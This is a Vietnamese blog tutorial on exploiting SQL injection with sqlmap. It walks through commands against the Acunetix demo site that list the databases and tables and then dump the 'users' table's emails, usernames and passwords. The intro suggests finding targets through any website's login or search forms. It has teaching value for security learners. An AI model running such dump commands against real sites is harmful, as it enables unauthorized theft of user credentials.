Sử Dụng SQLMAP để Khai Thác Lỗ Hỏng SQL Injection

Trang chủ » Sử Dụng Sqlmap » Sử Dụng SQLMAP để Khai Thác Lỗ Hỏng SQL Injection

Có thể bạn quan tâm

Thekalitools.com | Tự học sử dụng Kali Linux Thekalitools.com | Tự học sử dụng Kali Linux HomeKali Linux > Công cụSử dụng SQLMAP để khai thác lỗ hỏng SQL Injection Sử dụng SQLMAP để khai thác lỗ hỏng SQL Injection Unknown May 02, 2017

1. SQL Injection là gì?

Lỗ hổng SQL Injection là một lổ hỏng khá cơ bản và cũng khá nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever,..

2. Các mục tiêu, điểm yếu của website.

Ta có thể tìm các trang web cho submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng chẳng hạn như form login, search, feedback,..

3. Target và nội dung của bài viết này.

Đương nhiên đối với lỗi SQL Injection có rất nhiều kiểu khai thác, có thể tự query/command mà không cần sự hỗ trợ từ phần mềm thứ ba, cũng như sử dụng sqlroot, havij, sqlnija,.. Ở đây chúng ta sẽ sử dụng SQLMAP để thực hiện khai thác lỗ hỏng này.

a) SQLMAP là gì?

SQLMAP là công cụ khai thác những lổ hỏng của cơ sở dữ liệu SQL. Công cụ này được xem là công cụ khai thác SQL tốt nhất hiện nay. Được giới bảo mật và giới hacker sử dụng thường xuyên. Với người dùng Kali hoặc Back Track 5 thì SQLMAP đã được tích hợp sẵn vào hệ điều hành. Riêng Windows thì chúng ta phải cài đặt thêm python và SQLMAP để sử dụng.

b) Cách sử dụng, thực thi sqlmap.

Ở đây ta có một bài test của acunetix, đây là bài test phần mềm của họ nên không ảnh hưởng gì!
TARGET : 176.28.50.165/listproducts.php?cat=1
Để có thể khai thác được database của web này ta chạy cú pháp sau: sqlmap --url ' ' --dbs
sqlmap --url '176.28.50.165/listproducts.php?cat=1' --dbs
Ở đây ta có kết quả như sau: Ta tiếp tục khai thác tables trong database acuart bằng cú pháp: sqlmap --url ' ' -D acuart --tables
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart --tables
Sau khi có tables ta tiếp tục kiểm tra columns ở đây ta chọn tables users: sqlmap --url ' ' -D acuart -T users --columns
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users --columns
Cuối cùng ta dump data của columns users: sqlmap --url ' ' -D ' ' -T ' ' -C ' ' --dump
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users -C email,name,uname,pass--dump

KẾT:

Mình xin dừng bài viết tại đây, cảm ơn đã theo dõi,.. nếu có nhã ý hoặc thích bài viết này vui lòng share cho bạn bè cùng coi chung để ủng hộ tinh thần của member TKT. <33333333333333 Chyên Mục Kali Linux Kali Linux > Công cụ Bình chọn

You may like these posts

Post a Comment

0 Comments

Kết nối với tôi

Bài viết của tuần

Reaver - Công cụ tấn công Wifi Protected Setup (WPS)

Reaver - Công cụ tấn công Wifi Protected Setup (WPS)

October 12, 2017 Bắt đầu tự học Kali Linux

Bắt đầu tự học Kali Linux

August 01, 2021 Sửa lỗi "Detect and mount CD-ROM" khi cài đặt Kali Linux

Sửa lỗi "Detect and mount CD-ROM" khi cài đặt Kali Linux

July 05, 2016

Chuyên mục

  • Arch Linux 2
  • Chuyện Phiếm 7
  • IOT 1
  • Kali Linux 90
  • Linux 42

Cho người bắt đầu

Bắt đầu tự học Kali Linux Kali Linux > Cơ bản

Bắt đầu tự học Kali Linux

August 01, 2021

Chuyên Mục Con

  • Arch Linux > Cơ bản
  • Chuyện Phiếm > Thông báo
  • IOT > Cơ bản
  • Kali Linux > Android Pentest
  • Kali Linux > Công cụ
  • Kali Linux > Cơ bản
  • Kali Linux > Series
  • Kali Linux > Thủ Thuật
  • Kali Linux > Tin Tức
  • Kali Linux > Tài liệu
  • Kali Linux > Ứng dụng
  • Linux > Cơ bản
  • Linux > Thảo luận
  • Linux > Thủ Thuật
  • Linux > Ứng dụng

Tài trợ

Hướng dẫn lập trình Laravel cho người mới Công ty Thiết Kế Website Tại Hồ Chí Minh

Bài Viết Mới

3/recent/post-list

Chuyên mục

  • Arch Linux 2
  • Chuyện Phiếm 7
  • IOT 1
  • Kali Linux 90
  • Linux 42

Liên kết bạn bè

  • • Lập trình Laravel từ A-Z
  • • Blog Quản Trị Hệ Thống Mạng
  • • Chia sẻ kiến thúc quản trị VPS
  • • Tôi đi code dạo
  • • Linux Team Viet Nam
  • • TechZones - Kiến thức thực tế
  • • QuangNinhBay.Com Niềm vui là chia sẻ

Menu Footer Widget

  • Trang Chủ
  • Giới Thiệu
  • Liên Hệ
  • Sơ Đồ Trang
Crafted with by TemplatesYard | Distributed by Blogger Themes Powered by Blogger

Từ khóa » Sử Dụng Sqlmap